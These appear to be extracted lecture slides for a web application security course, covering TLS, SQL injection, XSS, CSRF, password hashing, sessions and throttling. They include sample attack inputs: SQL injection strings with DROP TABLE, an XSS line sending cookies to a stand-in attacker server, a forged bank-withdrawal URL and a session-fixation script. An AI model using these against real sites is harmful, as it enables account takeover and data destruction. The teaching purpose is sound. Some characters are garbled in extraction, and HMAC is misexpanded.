Web Application Development Instructor: Matthew Schurr.

Web Application Development Instructor: Matthew Schurr

Ethics Preface  Performing any of the attacks mentioned in this lecture against any online service is ILLEGAL.  Use this knowledge to create better applications and test your own applications for bugs.

Security Goals  Confidentiality Prevent an unauthorized read of application data  Integrity Prevent an unauthorized write to application data Ensure application data remains in a consistent state ○ Recall: SQL Transactions + Money Transfers  Availability Prevent unauthorized destruction of data Prevent application downtime and crashes

Threat Modeling  Focuses on understanding potential attackers  Means What knowledge, tools, and resources do attackers have?  Motive What does an attacker stand to gain by compromising your application?  Opportunity What are the possible (feasible) attack vectors against your application?

Common Attacker Types  Script Kiddie Knows how to use tools others have written Little technical understanding No programming knowledge  Individuals Smart, educated Willing to invest time and energy Programming capabilities Modest tools Can often get access to expensive equipment

Common Attacker Types  Organizations/Corporations Large amounts of sustained funding More equipment More individuals  Nation States Willing to break laws Able to exert physical force Able to use courts to compel cooperation Insider threats Wire taps

Man-in-the-Middle Attacks  Information sent over HTTP is transmitted in the clear (as plain text) over TCP/IP. Includes passwords, authentication tokens, session tokens, credit card information, financial data, etc.  Anyone in between you and the destination can intercept the transmission and extract sensitive information. Internet is a series of interconnected routers; usually, there will be hundreds in between you and your destination. Each router is a potential point of attack. Wireless packets can be intercepted by nearby users.

HTTP Request Examples Requests can contain sensitive information.

INTERNET Man-in-the-Middle Attack YOUR COMPUTER DESTINATION SERVER ROUTER HTTP Request Resources within the Internet are owned by variety of organizations across the world. MALICOUS ROUTER Malicious router reads your request in plain text as it passes through.

Transport Layer Security (TLS)  Commonly referred to as SSL  Built on top of TCP/IP, encrypts contents of packets Source and destination addresses still unencrypted Doesn’t provide anonymity HTTPS uses TLS… entire HTTP packets are encrypted  Foundation of all security on the Internet Without full message encryption, all of our other security measures fall apart (tokens and passwords are exposed)

TLS Goals  To establish an encrypted connection between two peers that no third party can break Contents of messages unreadable to third parties  Problem: How can an encrypted connection be securely established between two machines when a third party is privy to all communication between them?

Asymmetric (Public Key) Crypto  Server generates a public, private key pair Server publishes the public key (or provides it when asked) Server locally stores the private key IMPORTANT: private key is known only to server and must never be compromised  Mathematical relationship between private and public keys is such that: Private key cannot be re-derived from the public key Content encrypted using the public key can only be decrypted by its associated private key

Key Exchange  Used to establish a shared, private secret between browser and remote server  General Idea (greatly simplified): Browser asks server for its public key. Server sends public key to browser. Browser generates a random number r. Browser encrypts r using the server’s public key. Browser sends the encrypted r to the server. ○ Any third party listening in will be unable to decrypt r because they are not privy to the private key. Server decrypts r using the private key. Browser and server now have a shared secret (random number) r.  Actual Implementation: Elliptic Curve Diffie-Hellman

Example Key Exchange All math occurs in mod P space.

Symmetric Encryption  Content is encrypted and decrypted using the same shared key Designed to be incredibly hard to crack Messages look like random bits to observers (no meaning); meaning can only be obtained by using key Modern Implementation: AES (Advanced Encryption Standard) algorithm  Using shared secret r established in key exchange, all future packets encrypted symmetrically with r as the key. No other party knows r and thus cannot decrypt the messages. r is thrown away at the end of the session

Replay and Modification Attacks  Third party can still see encrypted messages going by, but has no idea what their content is.  Can modify the encrypted message (flip bits) blindly… can potentially have bad effect Solution: Hash-Based Message Authentication (HMAC), will discuss later  Can record and replay messages e.g. records encrypted message to send $100 from user A to B on a bank website and replays it to transfer more money Solution: Use a counter on messages  TLS protects from both of these attacks. Yay!

Further Problems  Assuming the crypto is perfect, it is possible to establish an encrypted connection between two parties that no third party can listen in on.  What’s the problem? We have an unbreakable cryptographic connection with someone, but we don’t know who that someone is. Potentially could be speaking with a man-in-the-middle attacker over an encrypted connection (intercepted our request for server’s public key and provided his own). Attacker establishes a second encrypted connection with real destination and acts a proxy, reading everything in plain text as it passes through his machine.  Key Problem: How can we be sure that we received the true public key from the server we are trying to talk to?

Compromised Key Exchange Bob AliceEve Public Key: EPublic Key: A Alice, what is your public key? Alice's public key is E. Alice, what is your public key? Alice's public key is A. UNENCRYPTED SYMMETRIC ENCRYPTEDASYMMETRIC ENCRYPTED Time Eve can see the password and secret info unencrypted.

Certificate Authorities  Solution: TLS verifies with a trusted third-party certificate authority that the server you are connecting to is actually operated by the organization claiming to operate it.  Verification uses digital certificate system (X.509 Certificates) which include the public key and various other information (including issuer).  Browser uses third party to verify that public key provided by server is correct. Naturally, this requires that server operators register their public keys with the third party authority (who will generally require some sort of proof of identity and a fee as part of registration process).  CAs sign certificates with their private key. Browser verifies signature offline using CA’s public key, and asks CA over the internet (using encrypted connection) whether the certificate is still valid (may have been revoked).

Certificate Authorities  How do we get the CA’s public key? Can’t just ask… run into same problem we are trying to solve (man in the middle attacks)  Public keys for certificate authorities are well- known and thus hard-coded into your browser and/or operating system. Prevents verification process from being man-in-the- middle attacked as you never have to ask for a public key.

Deeper Problems  Problems: No zone of authority… any CA can issue a certificate for any domain. Multiple certificates can be issued for the same domain (even by different authorities). All are accepted by operating system without question. There are many privately owned CAs spread throughout the world.  What happens if a trusted certificate authority is compromised? Hacker could steal authority’s private key Government could compel authority with a court order to issue a fake certificate

Deeper Problems  Certificate Authorities can issue “fake” certificates that allow government agencies to perform man-in-the- middle attacks that are invisible to end users. Same situation as before… attacker acts as proxy between browser and server. ○ Fake public key for victim website provided by the attacker is confirmed as legitimate by the fake certificate issued by the authority. These attacks have actually happened… been used by governments to identify political dissidents and read their messages on social networks.  Companies may require employees to install a company CA on their machines. Allows man in the middle attacks to be performed on employee SSL connections… no privacy.

Compromised CAs  As of now, we don’t have a solution.  Due to dynamic nature of internet, CAs are necessary. Trust must begin somewhere.  For ultra-high security apps, possible to be sure who we are connecting to by knowing the right public key beforehand (exchange it by some other medium, e.g. hand it to the other user physically on a note card).  Google has hardcoded their real public keys into Chrome… fake certificates for Google websites will be rejected by the Chrome browser.

Preventing Man-in-the-Middle  TLS (HTTPS) is the best option; very easy to add to your app. Configure your server to use HTTPS Update any links in your application to be over HTTPS Set the secure flag on Cookies to true Redirect unencrypted HTTP connections to HTTPS version  Downside: requires a certificate from a certificate authority to function properly... these cost money.  You can create your own certificate for free. However, all modern browsers will show an warning when you attempt to access a website that uses a self-signed certificate. Will likely deter people from using your site (especially if your app involves financial transactions or personal data). Provides no extra security (not verified by a third-party authority; vulnerable to man in the middle). Useful for testing.

Distributed Denial of Service (DDOS)  Goal: To prevent legitimate users from accessing a service  Means: Flooding packets until all server resources (CPU, Memory, or Bandwidth) are consumed and unavailable to legitimate users Attack is distributed across a large number of origin machines with different IP addresses  Issues: Cheap and easy to launch, tough to stop… incredibly effective at censoring smaller sites. Little technical knowledge required. Outcome is determined largely by who has superior bandwidth capacity Hard to identify and prosecute perpetrators

Distributed Denial of Service  Attacker Tools: Botnets (collection of computers created by malware and centrally controlled by an operator who can execute arbitrary code on infected machines) Anonymous’ Low Orbit Ion Canon  Mitigation Filters and firewalls ○ Effective against naïve attacks ○ Harder when attacker distributes across large number of IPs and tries to make DDOS traffic appear like legitimate traffic Industry Solution: Throw money at it! ○ Out scale your attacker by adding more application server nodes until they get bored and give up.

SQL Injection  SQL Injection is a technique used to attack data-driven applications. Targets all applications backed by a database system that uses a high-level query language (e.g. SQL).  The technique takes advantage of the fact that fragments of database queries often include user input. SQL queries are simply strings. When these strings include user input, they are a template string concatenated with the user’s input.

SQL Injection  What happens when we concatenate a user’s input with our SQL query, and the user’s input contains symbols that have significance in SQL?  Is it possible for the user (through their input) to modify the query?  The answer is YES.  Let’s look at some examples.

SQL Injection  We have a login system with two fields: username and password.  When a user attempts to log in, we execute: $q = sprintf(" SELECT * FROM `users` WHERE `username` = '%s' AND `password` = '%s';", $username, $password);  If we get a result, we assume the username/password is correct (the presence of a record indicates that a record existed with that username and password).  What is the problem?

SQL Injection  Let’s say our user enters the following in the username field on the login page: Admin'; /*  The concatenated query now reads: SELECT * FROM `users` WHERE `username` = 'Admin'; /*' AND `password` = 'input_passwd';  What will happen when this query is executed? Attacker can log in as any user w/o a password.

SQL Injection  In addition to changing the logic in our application, an attacker can execute any SQL statement.  Username Field: asdf’; DROP TABLE ùsers`; /*  Concatenated Query: SELECT * FROM ùsers` WHERE ùsername` = 'asdf'; DROP TABLE ùsers`; /*' AND `password` = 'input_passwd';  Attacker can modify the database arbitrarily! Plus, depending on the database software, it may actually be possible for them to execute arbitrary code on the host machine.

SQL Injection Limitations  Attackers are limited by the information available to them. Unless you are using a well-known open source system, the attackers do not know the database schema. They will have to guess at it.  If you do screw up and have an SQL injection vulnerability, it's helpful if your error messages do not reveal any additional information to attackers.

Indirect SQL Injection  Assume all parameters to a query are malicious  This query is executed by the registration program: sprintf("INSERT INTO ùsers` (ùsername`, …) VALUES ('%s', …);", $request->post['username'], …);  When a user goes to read their incoming messages, the program executes: $username = query("SELECT ùsername` FROM ùsers` WHERE …"); $messages = query("SELECT * FROM `messages` WHERE ùser` = '$username';");  What happens if a user registers an account containing SQL keywords, and then views the messages page? lol'; DROP TABLE `messages`;

Preventing SQL Injection  It is very easy to protect your application against SQL injection.  Prepared Statements Separate statement templates from their parameters Immune from SQL injection as long as the template is not derived from external input Parameter values are transmitted later using a different protocol.  If you have followed directions in class, your app is safe.

Prepared Statement Example

XSS  XSS = Cross-Site Scripting  Occurs when you allow an attacker to inject HTML markup into your application (that can be displayed to other users).  Common Causes: Failure to escape POST or GET parameters Failure to escape strings pulled from database

XSS  What’s the big deal? It’s just HTML.  If you can infect users using HTML, then why can’t any website on the internet infect users?  HTML code created by the provider of any given website is “safe.”  HTML code injected into the website is not. It can be harmful or annoying. Results in the loss of users, trust, and ad revenue

XSS  META Tag / Javascript Redirection The attacker injects HTML tags or Javascript that redirects client browsers to any URL. This could be to inappropriate content or a malicious/phishing website.  External Resources The attacker can inject Java Applets or Flash that attempt to install malware.

XSS  Tracking Attacker can cause you to load external resources on their server, enabling them to record your IP address  Javascript Using script tags, the attacker can inject Javascript code into your browser that accesses your cookies and sends them to his server by appending an image, script, or link tag requesting the URL: www.attackserver.com/collect/?cookies=YOURCOOKIES Bad as cookies contain authentication tokens and session IDs… may give attacker access to victim’s account. If an administrator account is compromised, may compromise other parts of the system.  The attacker is in an excellent position to perform CSRF attacks on your users.

XSS  Forms Can embed HTML forms on your site that submit to an attacker controlled site When user submits form, attacker can record the data received May be used to trick user into sending confidential information to attacker server (e.g. usernames, passwords, credit card info, etc.).

Preventing XSS  It is very simple to protect your application against XSS.  You must escape all data that originates from user input before outputting it.  Do not escape the same input twice!

Cross-Site Request Forgery (CSRF)  Occurs when unauthorized commands are transmitted by a user that the website trusts.  XSS exploits trust user has in a site… CSRF exploits trust site has in a user’s browser.  All resources loaded by your browser are the result of an HTTP request. Request will always come from your IP address Request always contains your user agent and cookies

CSRF Attacks  Problem: no limitation prevents a website running on one domain from requesting a resource on a different domain This is a fundamental part of the way the Internet functions. Leads to some unexpected side effects.  Website at www.google.com may contain an image tag: www.google.com  When you load www.google.com, you will also send a request to duncan.rice.edu/test.png.www.google.com This request will be issued from your IP address, with your User-Agent, and with your cookies for *.duncan.rice.edu.

CSRF Example  Let’s assume we use a bank website located at bank.ex.com and we are logged in as an authorized user.  The bank allows us to make withdrawals using the following URL over HTTP GET: https://bank.ex.com/withdraw?account=Alice&amount=1000000&for= Eve https://bank.ex.com/withdraw?account=Alice&amount=1000000&for= Eve  If we visit a malicious website (malicious.com) with the following image tag, what will happen? https://bank.ex.com/withdraw?account=Alice&amount=1000000&for=Eve

CSRF Example  The bank will make the withdrawal. We just transferred money to our attacker. Why? As far as the bank website can tell, the request is legitimate – it is originating from our browser, our IP address, our user-agent, with our session cookie and authentication token. The bank website has no way of telling that request originated from an image tag on an external site. Same attack also possible with or tags.  The odds of successfully performing CSRF attacks are low (the victim would need to be logged in as an authorized user on the target site). CSRF can still cause incredible damage and must be prevented.

CSRF: POST Deception  Also possible to perform CSRF attacks on forms that are submitted as POST requests  Malicious site can create a form like this:  Form pretends to be a form that submits a Tweet, but actually goes to the bank website and triggers a withdrawal. User never sees bank website because form is submitted to the iframe… user is oblivious to what happened. Truly deceptive attacker would also fake the tweet functionality of the form so user thinks that everything went okay (using a Javascript onsubmit event).

CSRF Prevention  Include a CSRF token on all requests (POST or GET) that modify data on the server Token is a long, randomly generated string Token can be stored in a cookie or session variable Included as hidden input or GET parameter  When user performs action that modifies server, check whether or not the provided token matches before performing action. Attacker does not have access to user’s cookies or session so cannot retrieve the token to forge the request.  Framework CSRF API does this; syntax in your lecture notes.

CSRF Token Example  The token is unique to each user and is stored on their session.

XSSI (Cross-Site Script Inclusion)  You operate a website which exposes a JSON API that returns information for the front end. GET /api/secret ==> ['secret', 'stuff']  A malicious site cannot request your JSON using AJAX due to the cross-origin policy.  However, a malicious site can include your JSON as a normal script since JSON is syntactically valid Javascript.

XSSI  Why is this a problem? (some) Browsers allow the user to override the native Array and Object constructors. Malicious site can still extract the information, even though it is not wrapped in function call (like in JSONP).  Solution #1: Add a CSRF token.  Solution #2: Add a prefix that makes the JSON invalid Javascript (generates syntax errors). PREFIX: )]}' AJAX requests can strip this prefix before parsing the JSON; inclusions cannot.

External Assets from Users  If you run a community website (such as a forum) that allows users to post links to external resources (for example, images) you should take precautions to prevent your users from being tracked or falling victim to CSRF requests. Only allow assets to be posted that link to trusted domains.  If a user posts an image located on a domain that is not trusted, you should download the image to your server and replace all references to the image with its location on your server. Since the original URL of the image is not preserved, users will not fall victim to CSRF attacks. Since the image is located on your server, you can be sure that a third party is not tracking your users by recording their IP addresses and/or other information. Google Mail does this with images embedded in emails.

Hash Functions  A hash function takes a single binary input of arbitrary length and returns a “random” fixed- length binary sequence. “random”: flipping one bit in input should flip half of the bits in the output  For any given input j, hash(j) is guaranteed to return the same output each time it is run. In this sense, hash(j) is representative of the value of j. hash(a) == hash(b)  a == b * true with high prob. a == b  hash(a) == hash(b) * always true

Hash Functions  It is very difficult to perform an inverse hash function, hash -1.  This means it is computationally expensive or impossible to recover the original input that created a particular hash. e.g. given hash(j) we cannot determine j  For any inverse hash function hash -1, we have no guarantee that hash -1 (hash(j)) = j. Why?

Hash Collisions  It stands to reason that, since there are an infinite number of inputs to a hash function, but a finite number of outputs, that two distinct inputs may produce the same output.  When this happens, a hash collision has occurred. This property is one of the reasons why inverse hash functions are difficult. Note: Cryptographic hash functions are specifically designed to make finding collisions difficult.  k != j && hash(j) == hash(k)  collision

Hash Collisions  However, the probability of a hash collision occurring is negligible, especially once we consider that our application will only use a small, finite subset of the infinite number of possible inputs into the hash function. e.g. passwords can only be 6-32 characters in length  Due to this, we can still say that a hash function gives a unique representation of each input value while obfuscating the input value in a way that it cannot be easily recovered. hash(a) == hash(b)  a == b * assume always true

Hash Uses  Hashes can represent the value of a piece of data that we do not want to store in plain text and that we do not want to be recoverable. e.g. passwords  Store passwords in the databases as hashes. When a user wants to log in and provides a password, we can hash the password they provide and compare it to the hash stored in the database. If they match, then the password is correct. If they don’t, then it was wrong. We then purge the plaintext password from memory.

Why should we use hashes?  In the event that our database is compromised and dumped, an attacker will not be able to access user accounts. Many users use the same email/username/password across many different sites and services  good for users Attackers cannot login to our services without knowing the passwords that generated the hashes (they must provide j such that hash(j) equals the stored hash in the database).  If you have ever used the password recovery feature on a website, most websites only allow you to reset your password – they do not send you your existing password. They cannot recover your existing password; it is hashed. If you ever encounter a website that does send you your password, then that website is doing it wrong.

Improper Usage of Hashes  Why not perform the hashing client side and then send the hash to the server to store?  This is effective against password disclosure, but it does not prevent unauthorized access to user accounts if the database is compromised.  Why? The hash has become a password equivalent. An attacker can just send an HTTP POST request containing the username and hash to our server to log in. Attacker now only needs to know hash(j), not j.

Rainbow Tables  What if someone were to pre-compute a mapping of input values to hashes. Create a table mapping j -> hash(j) for all possible j  You could then invert the mapping. Now you have a map of hash(j) -> j for all j  We call this mapping a Rainbow Table. This table will be different for each hash algorithm.  You can now use the rainbow table as an inverse hash function – you can look up the input that corresponds to any given hash.  This is a very efficient way to “crack” hashes and retrieve the original value. We can generate the table once, and then crack as many hashes as we want.

Rainbow Tables  Obviously, it is not feasible to create such a mapping for every possible value of j (recall: the space of j is infinite).  However, it is feasible to create one for every possible value of j containing 10 characters or less. These tables are widely available for download online for popular hash algorithms.  For the purpose of un-hashing user passwords, this would be sufficient in most cases to recover at least some of the passwords (if the system does not enforce complexity constraints).  Does this mean that hash algorithms are not a good way to store information, such as passwords, that we do not want to recover?

Salting  A salt is a random piece of data used as an additional input to a hash function. A new salt is generated each time a hash is performed. In addition to storing the hash in the database, we also store the salt along side it in plain text. This technique, known as salting, was developed to prevent attacks using rainbow tables.  The salt greatly increases the complexity of the input to the hash function, making it unfeasible to brute-force or create a rainbow table of sufficient length.

Salting  Salts are long, random, and unique to each individual user. Rainbow tables now depend on two variables: j, salt  A rainbow table generated for any given salt would only be able to crack hashes that were generated using that salt (in this case, a single user’s password). No longer worth the effort required to generate the tables Rainbow table attacks become infeasible

Salting  In the event that an attacker cracks the password using a rainbow table by finding a hash collision, they still will not be able to log in to that user’s account.  In order to login, they need to recover the string that, when appended to the salt, results in the proper hash. j s.t. hash(j + stored_salt) == stored_hash  The probability of the string that caused the collision appended to the salt resulting in the correct hash is effectively zero.

Salting Algorithm (Psuedocode)  We might use the following algorithm to encrypt a password: salt = random_bytes(128); encrypted = hash(input_password+salt); user.store_password(encrypted, salt); zero_memory_bytes(input_password);  When a user attempts to log in and we want to check a password: encrypted, salt = user.get_password() if(hash(input_password+salt) == encrypted) session.set_current_user(user) // Login success else display_login_failed() // Wrong password zero_memory_bytes(input_password);

Hash Algorithms  Each hash algorithm has its own unique properties. These properties make certain algorithms ideal for some tasks and not ideal for others.  Some algorithms are designed to be fast because we do not really care whether or not the original value can be easily recovered. These algorithms are useful when calculating hash table keys (a data structure) or verifying that two files are equivalent by hashing their contents (checksums). In both cases, we do not care if the original value can be easily recovered, and we want to perform the hashing quickly.

Fast Hash Algorithms  Memcached is a key-value store that uses a hash table based on a user-provided key to determine the appropriate slave server to read/write the associated value to/from. If we used a slow hashing algorithm (say that generating a hash took 5 seconds), reads and writes to the data structure would take a minimum of 5 seconds. This access time would defeat the purpose of using memcached; it is supposed to be very fast!  Dictionaries in Python are implemented in a similar way. Consider some of the programs you have written in class. Would it seriously hinder the running time of your programs if Python used a slow hash function?

Hash Algorithms (cont.)  Other hash algorithms are designed to be slow and make the original value difficult to recover. e.g. bcrypt, hmac  These algorithms are ideal for storing secrets (such as passwords and authentication tokens). The slow speed makes brute-force attacks harder. We do not want the original values to be easily recoverable.

bcrypt  As computer hardware improves, hash algorithms run faster and faster making them easier to crack via brute force.  Researches have designed a hash algorithm called bcrypt which takes three inputs: a secret, a salt, and a cost. Output now depends on three variables… brute force or rainbow tables are more unfeasible. Store the hash in the database along with plaintext cost and salt.  bcrypt is ideal for storing passwords or secrets Even as computer hardware improves, the amount of time required to generate a hash will remain constant as we increase the cost.  To increase cost: rehash the password using a new cost and a different salt the next time the user enters their password (plain text password available in memory at that time)

Sessions  Stores variables that persist through page views and are specific to a particular user Acts as a simple key-value store (like a hash table) Includes account that user is logged in to  Sessions are temporary, short-term storage May expire or be invalidated at any point in time either by the server or client Generally persist for as long as the user is active and a short period afterwards  All data attached to the session is stored server-side (prevents tampering).  How do we associate the data stored server-side with a single user’s browser? In other words, how do we uniquely identify the user’s browser?

Unique Identification  Option 1: IP Addresses Can be faked via man-in-the-middle, routing nodes ○ No integrity guarantees provided by the Internet. Changes over time (sometimes quickly – cell phone transferring cell towers) Users behind the same router may have the same public IP address  IP Addresses are not a viable choice for identifying a single user.

Stateless Protocols  Recall: HTTP is stateless; the protocol itself remembers nothing about the clients.  However, we still want our applications to have state (we must remember logins, etc.).  Solution: Cookies We send the client a piece of information associated with a key to remember The client sends that same piece of information back on all subsequent requests

Unique Identification  Option 2: Cookies Benefits: ○ Stored locally on client’s machine; don’t change as user moves around ○ Accessible only by the domain that stored them ○ Can be configured to be accessible only over secure HTTPS connections Shortcomings: ○ Remain present on public machines even after user leaves ○ May not be supported or enabled by the client  Cookies are the only reliable option for identifying a user.

What’s wrong with Cookies?  Recall: Cookies are stored completely client-side. This means an attacker can… View their stored cookies Delete cookies Create cookies with any properties Modify existing cookies to have any properties  How can we prevent tampering with cookies? Solution: Hash Functions  It is not possible to prevent deletion, but we can control creation, modification, and sometimes even disclosure of the value.

Cookie Control  To prevent modification, we can use a strong cryptographic hash function as follows: cookie.value = value + hash(secret + value)  When receiving cookies, we can extract the value, provided hash, and check: hash(secret + provided_value) == provided_hash  If the signature is not present or does not match, reject the cookie (act is if it doesn’t exist).

Cookie Control  Why does this work? Since the secret is known only to the server, and cannot be recovered from the hash, an attacker cannot forge a cookie signature. Modifying a cookie will cause the value and hash not to match. The attacker does not know how to modify the hash to make it match.  You should use an HMAC hashing algorithm; they were specifically designed for this purpose. Hidden Message Authentication Code  IMPORTANT: This does not prevent replication of a cookie. An attacker can still perform man-in-the-middle attacks.

Cookie Disclosure  You can prevent users from seeing the values stored in their cookies by encrypting them with a symmetric encryption algorithm (e.g. AES).  When setting: cookie.value = encrypt(value, secret)  When reading: value = decrypt(cookie.value, secret)  IMPORTANT: Encryption by itself DOES NOT guarantee integrity; user cannot see plaintext cookie value, but can still modify crypttext. You’ll need to use this in combination with some other mechanism (such as HMAC) to verify the authenticity of the cookie’s data.  IMPORTANT: Encrypting the value of a cookie has no effect on an attacker’s ability to perform man in the middle attacks… can still replicate the cookie.

Session Identifiers  We need to set a cookie containing a session identifier that will be transmitted back to our app on every request.  What makes a good session identifier? It is long. It is random.  How can we prevent the session identifier cookie from being tampered with? Use an HMAC signature Set HTTP Only flag on the cookie (inaccessible via javascript) Set Secure Only flag on the cookie (accessible only over HTTPS)  Session IDs are password equivalents; you must store them in your database as hashes!

Session ID Theft  What happens when an attacker intercepts another user’s cookies (including their session ID)? The attacker can now log in as that user by copying the victim’s cookies into the his own browser. The attacker still does not know the user’s password.  How can we prevent theft? Identify users by combination of IP address and session ID? ○ No effect; Internet does not protect against IP address spoofing. ○ If target and attacker behind same router, they will have same public IP (public access points in coffee shops, airports, universities, etc).

Preventing Session ID Theft  How can we prevent theft (continued)? Check for changes to user-agent header? ○ No effect; the attacker can spoof that, too (and if they have access to cookies, they also have access to the user agent header) Encrypting the cookie value? ○ No effect; the hacker doesn’t need to decrypt to use it Using HMAC to prevent cookie modification? ○ No effect; the attacker only needs to copy the cookie not modify it  There is only one way to prevent session ID theft: use HTTPS.

Session Fixation Attacks  Attacker can fixate (set) another user’s session ID using a vulnerability in the session implementation  Potential Attack Scenario: Assume: our server is vulnerable to an XSS attack, session IDs are stored in the “sessionid” cookie. Attacker convinces victim to view page on our site with following HTML code injected via XSS: ○ document.cookie = "sessionid=ABCDEFG;"; Victim logs into the site using their credentials. Attacker knows user’s session ID (was set via javascript code and re-used by server-side session handling code). Attacker can now gain unauthorized access to victim’s account. Verifying the session cookie via HMAC is not a solution to this problem. Why?

Preventing Fixation Attacks  Sessions should have a short lifetime (depending on security requirements of application). After period of inactivity, they are invalidated.  Session identifiers should be regenerated frequently. For high security applications, they might be good only for the next subsequent request. SHOULD occur at regular intervals (e.g. 5 minutes or every request) SHOULD occur when user’s IP address changes MUST occur when switching protocols (HTTP HTTPS) MUST occur when user’s privileges escalate or login occurs

Mitigating Damage  How can we mitigate damage if session is compromised? Require the user to enter their password to make any serious changes to their account, before exposing private data, and to verify financial transactions. ○ Attacker does not know the actual password, only the session cookie. Example: user must have entered their current password recently in order to initiate a money transfer or perform an administrator action

Detecting Compromise (GeoIP)  Can retrieve an approximate location of a user given their IP address Longitude and Latitude coordinates Not overly accurate (~99.9% accurate on country level, way less accurate at region level) Can be tricked, but may prevent some attacks  Enables us to detect only significant location changes and act accordingly e.g. user’s session transferring from US to China instantly provides strong indication that they were compromised Employed by both Facebook and Google

Passwords  Passwords stored as salted hashes in database.  Should be case-sensitive.  Support pass phrases (punctuation, symbols).  Enforce complexity constraints upon users. Download database of most commonly used passwords and block their use. Don’t let people choose same password as their username. Enforce a minimum length. Calculate entropy and enforce a threshold.

Password Equivalents  All password equivalents are also stored as hashes. Session IDs Password Reset Codes Persistent Authentication Tokens Secret Answers  All password equivalents must be subject to security measures that are at least as strong as those enforced on passwords. The overall security of the system is reduced to the level of the weakest component.

Secret Questions/Answers  Secret questions weaken the security of system. Answers are always easier to guess than the password itself. Answers can be lifted off of Facebook, Blogs, etc. Commonly used questions are ineffective against attackers that actually know the person  Prevalent because they result in less customer support calls (saves money for companies)  If you must employ security questions: Use a combination of three or more uncommon questions Require additional factor before allowing user to enter answers and reset password (email or text them a code)

Login Systems  SHOULD have the facility to alert the user as to failed login attempts and offer to allow them to change their password (if applicable).  SHOULD have the facility to notify the user of their last logged in time, and subsequently report a fraudulent login (and change their password) if they disagree with that date and time.  SHOULD allow logins from multiple machines simultaneously (users don’t want to log back in every time they switch between their laptop and phone)  MAY elect to utilize multi-factor authentication (cell phone, authenticator, email)

Error Messages  Authentication and registration processes (particularly login failures) should provide no information whether the account exists or the entered password was wrong. Use a single error message covering both scenarios. Reduces effectiveness of brute-force attacks.  Error messages in-general should reveal nothing to attackers. Knowledge is power. Errors should still be logged for review later by an administrator.

Persistent Authentication  Sessions are temporary… might wish to preserve a user’s login beyond the current session.  Effect is achieved using a second cookie containing a persistent authentication token which is good for a single use.  Example: User logs into application using the “Remember Me” option. “Remember Me” option sets a persistent login token as a cookie, and marks the user’s session to indicate the account logged in to. User stops using application causing their session to time out. On next visit, user is automatically logged in to a new session using the persistent login token (rather than a traditional username/password form). The token is consumed (invalidated) and a brand new token is issued and set as a cookie.

Persistent Auth Tokens  A token is good for a single use; invalidated after use and a new one is issued.  Current token is invalidated when user logs out through any deliberate logout function.  User has the option to purge all persistent tokens for their account.  Periodically, the system purges unused tokens older than a certain age.  Used by almost every website you can think of

Persistent Auth Security  Access to vital user functions should always require re-entry of the user’s password  User should not be able to perform the following functions after performing a cookie-based login from a persistent token without re-entering his password: Change password Change email Modify account settings Initiate financial transactions

Brute-Force Attacks and Spam  Brute-Force Attacks: attacker attempts to perform an action that requires validation over and over again using random guesses, hoping that eventually one of their guesses will be right Example: attempting to guess a user’s password Usually done by a program… thousands of guesses per second  Spam: forms in your application filled out and submitted repeatedly by computer programs  Spam and Brute-Force Attacks are prevented in the exact same ways

CAPTCHAs  Images generated by a server-side program containing randomly generated numbers, letters, and symbols  In order to perform action, user must correctly copy content into a text field  Attempt to ensure that forms are submitted only by humans, not robots or automated tools Difficult for computer programs to correctly recognize symbols  Not always user-friendly or human solvable… still ineffective against cheap third-world labor ($12/500 tests)  Always use Google’s reCAPTCHA implementation (OCR-hard by definition as it uses already misclassified book scans) and is very user-friendly

Throttling  It takes virtually no time to crack an intricate, symbols-and-letters, upper-and-lowercase password, if it is less than 8 characters long.  It would, however, take an inordinate amount of time to crack even a 6-character password if you were limited to one attempt per second!  Throttling is the practice of limiting the rate at which users can make requests that modify information on the server. Can also be used to limit rate at which users can attempt to log in

Throttling  Failed authentication attempt throttling should be keyed off of both the client’s IP address and the victim account.  Necessary to key off of account due to distributed brute-force attacks  Use an increasing delay for each attempt with an upper bound.  In seconds: 0 0 0 2 4 8 16 30 60 60 60….  Cookie-based logins via persistent tokens should be throttled, too.  Separate throttling counter for persistent logins  Prevents users from trying to brute-force guess persistent tokens

Throttling (Denial of Service)  Attacker may try to lock legitimate user out of their account using the throttling system  Option 1: Email or text throttling bypass code to user Code is active only for limited period of time and limited attempts Each account only eligible to receive a code every 12 hours  Option 2: Allow users to bypass throttling by solving a CAPTCHA Throttling should also be imposed on CAPTCHA-based login attempts, but in a separate pool

Database Concurrency  We are operating a banking web application.  Let’s say that Bob makes a deposit into his account. 1) $oldBalance = SELECT `balance` FROM àccounts` WHERE àcc` = ‘1’ LIMIT 1; 2) $newBalance = $oldBalance + $amountDeposited; 3) UPDATE àccounts` SET `balance` = $newBalance WHERE àcc` = ‘1’;  What happens if Bob’s wife tries to make a deposit at the same time? 4) $oldBalance = SELECT `balance` FROM àccounts` WHERE àcc` = ‘1’ LIMIT 1; 5) $newBalance = $oldBalance + $amountDeposited2; 6) UPDATE àccounts` SET `balance` = $newBalance WHERE àcc` = ‘1’;  The database system may choose to execute concurrent queries in any order; the only constraints are that 1 comes before 3 and 4 before 6. What happens if the system chooses 1, 4, 3, 6?

Database Concurrency  We could fix the example in the previous slide by making the query for both deposits be: UPDATE `accounts` SET `balance` = `balance` + $amountDeposited WHERE `acc` = ‘1’;  At first glance, you may think that this still results in a data race. However, concurrency controls within the database system guarantee that the end result of two queries (Q1, Q2) executed in parallel must be either: Q1; Q2; Q2; Q1;  Why did this not help us on the previous slide?

Database Concurrency  What if we absolutely must execute a sequence of queries in order to update something and we want to be sure no concurrent queries altered the database while intermediate calculations were held in memory? Example: Bob and his wife making deposits at the same time where each deposit requires two queries (a read and a write).  What if we need to execute a group of queries and we must be absolutely certain that every single query within the group succeeds? Example: Transfer money from one bank account to another

Transactions (IMPORTANT)  In order for your application to be secure, you must ensure that its data remains in a safe, consistent state at all times.  Consider a banking website that allows its users to transfer money between one another online. 1. UPDATE àccounts` SET `balance` = `balance` - :amount WHERE ùser` = 'bob'; 2. UPDATE àccounts` SET `balance` = `balance` + :amount WHERE ùser` = 'alice';  What happens if the server crashes after (1) is executed?  What happens if (1) fails but (2) succeeds?

Transactions (continued)  A transaction is a set of operations to a database that are treated as a unit. End behavior of two transactions T1, T2 executed in parallel is either T1; T2 or T2; T1  A transaction… runs in isolation. enforces the constraint that all of its operations must succeed. If any operation fails, the database is reverted to the state it was in when the transaction began.  Transactions can happen concurrently, provide system failure recovery, and ensure the database is always in a consistent state.

